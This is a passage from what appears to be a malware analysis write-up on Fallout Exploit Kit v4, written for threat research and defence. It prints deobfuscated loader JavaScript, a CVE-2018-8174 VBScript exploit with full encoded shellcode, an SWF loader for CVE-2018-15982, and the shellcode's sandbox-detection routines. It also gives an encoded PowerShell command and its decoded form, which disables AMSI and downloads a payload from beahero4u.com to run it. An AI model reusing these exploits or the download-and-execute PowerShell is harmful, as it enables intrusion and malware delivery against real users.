data are decoded. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'],16); // str_G2 => str_F2.modPow(str_C2, str_D2) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll,lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while(IIIIlI1IllII > 0) { I1Il1I1 = '0'+I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); // str_G2 var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // str_A2 // aes_decrypt() var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIIIIllIl1'], // enc_data_1 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['II11lIl11'], // enc_data_2 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); </code></pre></div></div> The data thus decoded is written to Body and executed. The decoded data is the CVE-2018-8174 exploit code and the CVE-2018-15982 exploit code for reading swf loader. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(IlIII1lll['length'] !== 0) { var IIlIl = window['document']['createElement']("iframe"); IIlIl['setAttribute']("id", "IlIlll1I1"); window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl); var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document']; I11I11IIlIII['open'](); I11I11IIlIII['write'](IlIII1lll); I11I11IIlIII['close'](); } if(lIl1l1I['length'] !== 0) { var l1III11 = window['document']['createElement']("iframe"); l1III11['setAttribute']("id", "lII1I1IlI1I"); window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11); var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document']; llIll1lI['open'](); llIll1lI['write'](lIl1l1I); llIll1lI['close'](); } </code></pre></div></div> For swf loader, the following code is executed. <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> </head> <body> <div id="BnjJbx"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle"> <param name="movie" value="/24_02_1964/05_04_1933/3410-Skegger-12666" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="showall" /> <param name="menu" value="false" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /></object></div> </body> </html> </code></pre></div></div> Thus, the swf file that exploits CVE-2018-15982 is read and executed. <h2 id="cve-2018-8174">CVE-2018-8174</h2> The exploit code used is very similar to PoC. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit </code></pre></div></div> The process to generate shellcode is like this. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u8B55%u83EC%uF8E4%uEC81%u00CC%u0000%u5653%uE857%u08B0%u0000%uF08B%u44C7%u1824%u05CD%u5379%u848D%uB024%u0000%u8900%u2474%u8934%u2444%u8D14%u2454%u8D10%u2444%uC744%u2444%u1D1C%u2BDE%u8982%u2444%u8D10%u244C%u8D14%u2484%u0094%u0000%u4489%u2824%u448D%u1824%u8D50%u2444%u502C%u1EE8%u0006%u8B00%u245C%u8D18%u244C%u8B18%u247C%u8B1C%u8903%u2444%u8B40%u1C47%u4489%u4424%u478B%u8920%u2444%u3348%u89C0%u2444%u8918%u2444%u891C%u2444%uE834%u02E9%u0000%u548D%u1C24%uCF8B%u66E8%u0002%u8300%u2464%u0038%u4C8D%u2024%u406A%uE856%u02FE%u0000%uC683%u8D40%u244C%u6828%u0080%u0000%uE856%u02EC%u0000%u74FF%u2C24%u4C8B%u5024%u448D%u4824%u74FF%u2C24%uD68B%u74FF%u4824%u5753%u8D50%u2444%u5060%u448D%u4C24%uE850%u0389%u0000%uDB33%uC483%u3938%u245C%u742C%u8B41%u2474%u8D38%u2444%u6A48%u5F44%u5357%uFF50%u83D6%u0CC4%u7C89%u4824%u448D%u1824%u106A%u5053%uD6FF%uC483%u8D0C%u2444%u5018%u448D%u4C24%u5350%u6853%u0000%u0800%u5353%uFF53%u2474%u5350%u54FF%u6424%uFF53%u2454%u5F44%u5B5E%uE58B%uC35D%u8B55%u83EC%u0CEC%u458B%u890C%uF445%u458B%u8908%uF845%u6583%u00FC%u07EB%u458B%u40FC%u4589%u8BFC%uFC45%u453B%u7310%u8B12%uF845%u4503%u8BFC%uF44D%u4D03%u8AFC%u8809%uEB08%uC9DF%u55C3%uEC8B%u458B%u0F08%u00BE%uC085%u2D74%u458B%u0F08%u00BE%uF883%u7C41%u8B19%u0845%uBE0F%u8300%u5AF8%u0E7F%u458B%u0F08%u00BE%uC083%u8B20%u084D%u0188%u458B%u4008%u4589%uEB08%u5DC9%u55C3%uEC8B%u8B51%u0845%u4589%uEBFC%u8B07%uFC45%u8940%uFC45%u458B%u0FFC%u00BE%uC085%u0274%uEDEB%u458B%u2BFC%u0845%uC3C9%u5653%u8B57%u33D9%u53FF%u3347%uE8F6%uFFC9%uFFFF%u8B59%u85C8%u74C9%u0F24%u03B6%uD233%uC703%uF1BF%u00FF%uF700%u43F7%uFA8B%uD233%u048D%uBE3E%uFFF1%u0000%uF6F7%uF28B%uE983%u7501%uC1DC%u10E6%u048D%u5F37%u5B5E%u55C3%uEC8B%uEC83%u5310%u5756%uF98B%u5589%u33FC%u8BF6%u3C47%u5C8B%u7838%uDF03%u438B%u8B1C%u204B%uC703%u4589%u03F0%u8BCF%u2443%uC703%u4D89%u89F8%uF445%u7339%u7618%u8B18%uB10C%uCF03%u7BE8%uFFFF%u3BFF%uFC45%u1074%u4D8B%u46F8%u733B%u7218%u33E8%u5FC0%u5B5E%uC3C9%u458B%u8BF4%uF04D%uB70F%u7004%u048B%u0381%uEBC7%u64EA%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u8B00%u1040%u64C3%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u1040%u56C3%u8B57%u8BF9%u56F2%u078B%uD0FF%uC085%u0675%u478B%u5604%uD0FF%u5E5F%u56C3%uF18B%uE856%uFEAB%uFFFF%u8B59%uE8CE%uFF06%uFFFF%u3D5E%u06DE%u3F54%u1F74%u413D%uCD05%u7425%u3D18%u0309%u0F05%u1174%uEC3D%u1803%u7416%u3D0A%u044B%u19F3%u0374%uC033%u33C3%u40C0%u55C3%uEC8B%uEC81%u013C%u0000%u418B%u5308%u5756%uFA8B%uDB33%u518B%u890C%uF855%u518B%u8B10%u1449%u6A53%u8902%uFC55%u4D89%uFFF4%u8BD0%u83F0%uFFFE%u4074%u858D%uFEC8%uFFFF%u85C7%uFEC8%uFFFF%u0128%u0000%u5650%u55FF%u85F8%u74C0%u8D27%uEC8D%uFFFE%uE8FF%uFF6F%uFFFF%uC085%u1575%u858D%uFEC8%uFFFF%u5650%u55FF%u85FC%u75C0%u56E2%u55FF%uEBF4%u3303%u43DB%u1F89%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u5756%uC033%uF98B%u3340%u53C9%uA20F%uF38B%u8D5B%uF05D%u0389%u7389%u8904%u084B%u5389%u8B0C%uF845%uE8C1%u891F%u5F07%u5B5E%uC3C9%u8B55%u81EC%u04EC%u0001%u5300%u3356%u57F6%uC68B%u8488%uFC05%uFFFE%u40FF%u003D%u0001%u7200%u8BF1%u8BDE%u8BFE%u8AF1%u3D94%uFEFC%uFFFF%uC78B%uE083%u0F07%uCAB6%uB60F%u3004%uC303%uC803%uB60F%u8AD9%u1D84%uFEFC%uFFFF%u8488%uFC3D%uFFFE%u47FF%u9488%uFC1D%uFFFE%u81FF%u00FF%u0001%u7200%u8BC8%u0C7D%uF633%uDE8B%uFF85%u5574%u458B%u8908%u0C45%u438D%u0F01%uD8B6%u948A%uFC1D%uFFFE%u0FFF%uC2B6%uC603%uB60F%u8AF0%u3584%uFEFC%uFFFF%u8488%uFC1D%uFFFE%u88FF%u3594%uFEFC%uFFFF%uB60F%u1D8C%uFEFC%uFFFF%uB60F%u03C2%u8BC8%u0C45%uB60F%u8AC9%u0D8C%uFEFC%uFFFF%u0830%u8940%u0C45%uEF83%u7501%u8BB1%u0845%u5E5F%uC95B%u55C3%uEC8B%uEC83%u8B48%u1C45%u4D89%u53F4%u8B56%u8B08%u0870%u4D89%u8BF8%u0448%u4D89%u8BF0%u0C48%u4D89%u8BE8%u1048%u4D89%u8BE0%u1448%u4D89%u8BD8%u1848%u458B%u5714%u046A%u5589%u8BEC%u1850%u4D89%u8BC8%u2448%u458B%u6818%u1000%u0000%u046A%u006A%u388B%u5589%u89D4%uFC4D%u7D89%uFFD0%u6AD2%u8B04%u6AD8%u5300%u5D89%uFFE4%u83D7%u207D%u8D00%u1445%u046A%u5350%u1875%u7D83%u0024%u0975%u45C7%uC614%u90EA%uEB2A%uC71D%u1445%uF9D7%u2A90%u14EB%u7D83%u0024%u45C7%uD214%u90EB%u752A%uC707%u1445%uE4D2%u2A90%u29E8%uFFFC%u8BFF%u084D%u458D%u83C0%u0CC4%u45C7%uF4C0%uDBBC%uC770%uC445%uE14D%u1989%u086A%uE850%uFE76%uFFFF%u5959%uDB33%u458D%u53C0%u5353%u5053%u55FF%u8BF8%u85F8%u75FF%u8B0A%u1045%u1889%u23E9%u0001%u5300%u6A53%u5303%u6853%u01BB%u0000%u75FF%u57F4%u55FF%u8BF0%u89D8%u145D%uDB85%u840F%u00FB%u0000%u4D8B%u8D08%uB845%u086A%uC750%uB845%uC6E5%u1DB0%u45C7%u7CBC%uB9D1%uE819%uFE1C%uFFFF%u5959%uC033%u6850%u3000%u8080%u5050%uFF50%uEC75%u458D%u50B8%uFF53%uE855%uD88B%uDB85%u840F%u00B8%u0000%u046A%u75FF%u6AE4%u6A00%u5300%u55FF%u85E0%u0FC0%uA084%u0000%u8300%u1C65%u8D00%uDC45%u6583%u00DC%u8D50%u1845%u45C7%u0418%u0000%u5000%u458D%u501C%u0568%u0000%u5320%u55FF%u83D8%u187D%u7400%u8376%u1C7D%u7400%u6A70%u6804%u1000%u0000%u75FF%u6A1C%uFF00%uD455%u75FF%u8B1C%u0C4D%u006A%u8950%uFF01%uD055%u6583%u00CC%u458D%u50CC%u458B%uFF0C%u1C75%u30FF%uFF53%uC855%uFF53%uFFD6%u1475%uD6FF%uFF57%u83D6%u207D%u8B00%uFC75%u0474%u006A%uD6FF%u7D83%u0024%u0474%u006A%uD6FF%u458B%uFF0C%u1C75%u4D8B%uFF08%uE830%uFD52%uFFFF%u458B%u5910%uC759%u0100%u0000%uEB00%u5311%uD6FF%u75FF%uFF14%u57D6%uD6FF%u458B%u8310%u0020%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u8B56%u8BF1%u57DA%u7589%uE8FC%uFBF7%uFFFF%uF88B%u43BA%u1C04%u8B19%uE8CF%uFB83%uFFFF%u368B%u75BA%uB905%u8B28%u89CF%u1446%u72E8%uFFFB%u8BFF%uFC75%u51BA%u3209%u8B73%u890E%u1C41%uCF8B%u5EE8%uFFFB%u8BFF%uBA0E%u0614%u33F5%u4189%u8B08%uE8CF%uFB4D%uFFFF%u0E8B%u97BA%u8104%u891D%u8B01%uE8CF%uFB3D%uFFFF%u0E8B%u4DBA%u8505%u8927%u0441%uCF8B%u2CE8%uFFFB%u8BFF%uBA0E%u04E4%u2259%u4189%u8B0C%uE8CF%uFB1B%uFFFF%u0E8B%uD3BA%u7004%u891F%u1041%uCF8B%u0AE8%uFFFB%u8BFF%uBA0E%u047A%u1A1E%u4189%u8B18%uE8CF%uFAF9%uFFFF%u0E8B%uF3BA%u8503%u8915%u2041%uCF8B%uE8E8%uFFFA%u8BFF%u890E%u2441%u58E8%uFFFB%uBAFF%u028C%u08D8%uC88B%uD2E8%uFFFA%u8BFF%u6A0B%u890C%u8D01%uF045%u4D8B%u500C%u45C7%uC2F0%u8DE0%uC720%uF445%uB412%u37CD%u45C7%uEFF8%uF16B%uE8A4%uFC34%uFFFF%u5959%u0E8B%u558D%uE8F0%uFB2B%uFFFF%uF88B%u5DBA%u1006%u8B36%uE8CF%uFA91%uFFFF%u758B%uBA08%u0584%u29FB%u0E8B%u4189%u8B0C%uE8CF%uFA7D%uFFFF%u0E8B%u55BA%uC706%u8935%u1441%uCF8B%u6CE8%uFFFA%u8BFF%uBA0E%u078C%u4B92%u4189%u8B10%uE8CF%uFA5B%uFFFF%u0E8B%u55BA%u6406%u8936%u0841%uCF8B%u4AE8%uFFFA%u8BFF%uBA0E%u051D%u245C%u4189%u8B04%uE8CF%uFA39%uFFFF%u0E8B%u46BA%uC006%u8935%u8B01%uE8CF%uFA29%uFFFF%u0E8B%u5E5F%u895B%u1841%uC3C9%uECD7%u2182%uA319%u2DD6%u29FE%uCBFE%u5CE9%uB27D%u501A%uCF26%u6A47%u54FE%uDABA%u8A85%uEF83%u3361%u09D1%u20F7%u16EC%uD9B7%u917A%uDE1A%u2281%uEA7F%u3143%u6ACE%u1A52%u4FF4%u500B%uC276%u5A57%uC1F8%uE09A%u258F%uA209%u6BCD%u28EE%uE3E7%u2FD5%u8D28%u3568%uAE4A%u0623%u309B%u8E87%uE4E0%u8EF7%u5F02%u7AB4%u73DA%u7483%uB0D2%uBC0E%uB049%u40EE%u8610%u7665%u07AF%u7330%u3C80%u6436%uF745%u5A61%uC1F8%uBBE2%u5581%uF71D%u00A7%u7F8D%u4907%u11AF%uB565%uF4E6%u755E%u19EE%u23AF%u8DB6%uEB89%u2838%u11BF%uC109%u1219%uD17E%uBEEA%uDD49%uF759%u09D6%uEA08%u8E45%uB602%u1B93%u19C4%u9146%uB94D%u9E6C%u0BC7%u00E8%u0000%u5800%uE883%u2D05%u00C0%u0000%u00C3" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function </code></pre></div></div> Let’s read shellcode. <h2 id="shellcode">Shellcode</h2> The decoding algorithm in the shellcode has not changed from v3 and remains RC4. <a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a> The hash algorithm of API hash has not changed either. API hashed by the dualaccModFFF1Hash algorithm. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this) { unsigned __int8 *v1; // ebx int v2; // edi unsigned int v3; // esi int i; // ecx unsigned int v5; // edx v1 = this; v2 = 1; v3 = 0; for ( i = zz_count(this); i; --i ) { v5 = (v2 + (unsigned int)*v1++) % 0xFFF1; v2 = v5; v3 = (v3 + v5) % 0xFFF1; } return v2 + (v3 << 16); } </code></pre></div></div> However, there were interesting changes. Analysis environment detection codes has been added in shellcode. <h3 id="vm-detection">VM Detection</h3> Query hypervisor precense using CPUID. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall zz_vm_detect(unsigned int *this) { unsigned int *v1; // edi unsigned int result; // eax v1 = this; _EAX = 1; __asm { cpuid } result = _ECX >> 31; *v1 = _ECX >> 31; return result; } </code></pre></div></div> <h3 id="process-detection">Process Detection</h3> Get a list of running processes. <img src="https://nao-sec.org/assets/2019-07-09/03.jpg" alt="" /> Convert process name to lower case. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl zz_tolowercase(_BYTE *a1) { int result; // eax while ( 1 ) { result = (char)*a1; if ( !*a1 ) break; if ( (char)*a1 >= 65 && (char)*a1 <= 90 ) *a1 += 32; ++a1; } return result; } </code></pre></div></div> Compare to the following hashes. Once again, It uses the dualaccModFFF1Hash algorithm. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x3F5406DE 0x25CD0541 0x0F050309 0x161803EC 0x19F3044B </code></pre></div></div> <img src="https://nao-sec.org/assets/2019-07-09/04.jpg" alt="" /> Two process names were identified. I do not know the others. <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>> hex(dualaccModFFF1Hash("wireshark.exe")) '0x25cd0541' >>> hex(dualaccModFFF1Hash("fiddler.exe")) '0x19f3044b' </code></pre></div></div> Like v3, shellcode downloads, decodes and executes encrypted PowerShell code. <h2 id="powershell">PowerShell</h2> The PowerShell code to be executed is like this. <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe -w hidden -noni -enc dAByAHkAewAkAGwAMQBJAGwAMQA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQA7ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAD0AJABsADEASQBsADEALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQASQAxAEkAbAAxADEAbAAxAEkAbAA9ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAC4ARwBlAHQARgBpAGUAbABkACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFkAVwAxAHoAYQBVAGwAdQBhAFgAUgBHAFkAVwBsAHMAWgBXAFEAPQAnACkAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAkAEkAMQBJAGwAMQAxAGwAMQBJAGwALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AH0AYwBhAHQAYwBoAHsAfQA7AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAIgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAEkAbABJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJADEASQBJADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAEkASQBsAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAMQBsAEkAbAAxAEkAMQBJADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAEkAMQBsAGwAMQBJAGwAMQBJADEAbAB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAGwASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAbAAxADEAMQBJAEkASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxAGwASQBsADEAbABsADEASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABJAEkASQBsADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAGwAMQAxAEkAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEASQBsAEkAbAAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAGwASQBJAEkAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAEkAMQBsAEkAbABJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbAAxAEkAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAASQBsAEkASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABJAGwAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBsAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbAAxAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbABJAGwAbABsAEkAMQBJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxAEkASQBJADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsADEASQBsADEAMQBJAEkASQB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAiACwAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoAHMAdAByAGkAbgBnACAASQBJAGwASQBJAEkALABzAHQAcgBpAG4AZwAgAEkAbABJAGwASQAsAEkAbgB0AFAAdAByACAASQAxADEAbAAxAEkALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAMQAsAGIAbwBvAGwAIABJAGwASQAxADEASQBJADEAMQAxADEALAB1AGkAbgB0ACAAbAAxADEAMQBJACwASQBuAHQAUAB0AHIAIABsAEkASQBJADEASQBsAGwASQAsAHMAdAByAGkAbgBnACAASQAxAEkAbAAxAGwASQAsAHIAZQBmACAAbABJADEAbABsADEASQBsADEASQAxAGwAIABsAGwAMQAxAEkASQBsADEASQAsAG8AdQB0ACAASQAxAGwASQBJADEASQBsADEAIABsAEkASQAxAEkASQApADsAfQAiADsAJABsAGwAbAAxAEkAbABsAEkAMQA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAEkAMQBsADEAMQBJADEAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAGEAaABlAHIAbwA0AHUALgBjAG8AbQAvADEAOQA1ADAALQAwADEALQAxADEALwBPADgAWgByACcAOwBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASgBHAE4AcwBhAFQAMABvAFQAbQBWADMATABVADkAaQBhAG0AVgBqAGQAQwBCAE8AWgBYAFEAdQBWADIAVgBpAFEAMgB4AHAAWgBXADUAMABLAFQAcwBrAFkAMgB4AHAATABrAGgAbABZAFcAUgBsAGMAbgBOAGIASgAxAFYAegBaAFgASQB0AFEAVwBkAGwAYgBuAFEAbgBYAFQAMABuAFMAagBVADMAVQBEAGwANQBNAFcAawB6AE0ARQAwAHgATQBEAEoAWQBOAFMAYwA3AEoARwBOAHMAYQBTADUARQBiADMAZAB1AGIARwA5AGgAWgBFAFoAcABiAEcAVQBvAEoARQBrAHgAYgBEAEUAeABTAFQARQBzAEoARwB4AHMAYgBEAEYASgBiAEcAeABKAE0AUwBrADcAJwApACkAfABpAGUAeAA7ACQASQAxAEkAMQBsADEASQBJAGwAbABJADEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABJADEAbABsADEASQBsADEASQAxAGwAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBsAEkASQAxAD0AMAB4ADAAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBJAEkAbABJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACkAOwAkAEkASQBsADEASQBsADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQA7AFsAbAAxAEkAbAAxADEASQBJAEkAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQBJAGwAbABJADEALAAkAGwAbABsADEASQBsAGwASQAxACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACwAWwByAGUAZgBdACQASQBJAGwAMQBJAGwAMQBJACkAfABvAHUAdAAtAG4AdQBsAGwAOwA= </code></pre></div></div> Let’s decode and clean. <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>try { $l1Il1 = [Ref].Assembly; $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils"); $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static'); $I1Il11l1Il.SetValue($null, $true); } catch { }; Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}"; $lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp"; $I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr'; $cli = (New-Object Net.WebClient); $cli.Headers['User-Agent'] = 'J57P9y1i30M102X5'; $cli.DownloadFile($I1l11I1, $lll1IllI1); $I1I1l1IIllI1 = New-Object lI1ll1Il1I1l; $I1I1l1IIllI1.IlII1 = 0x0; 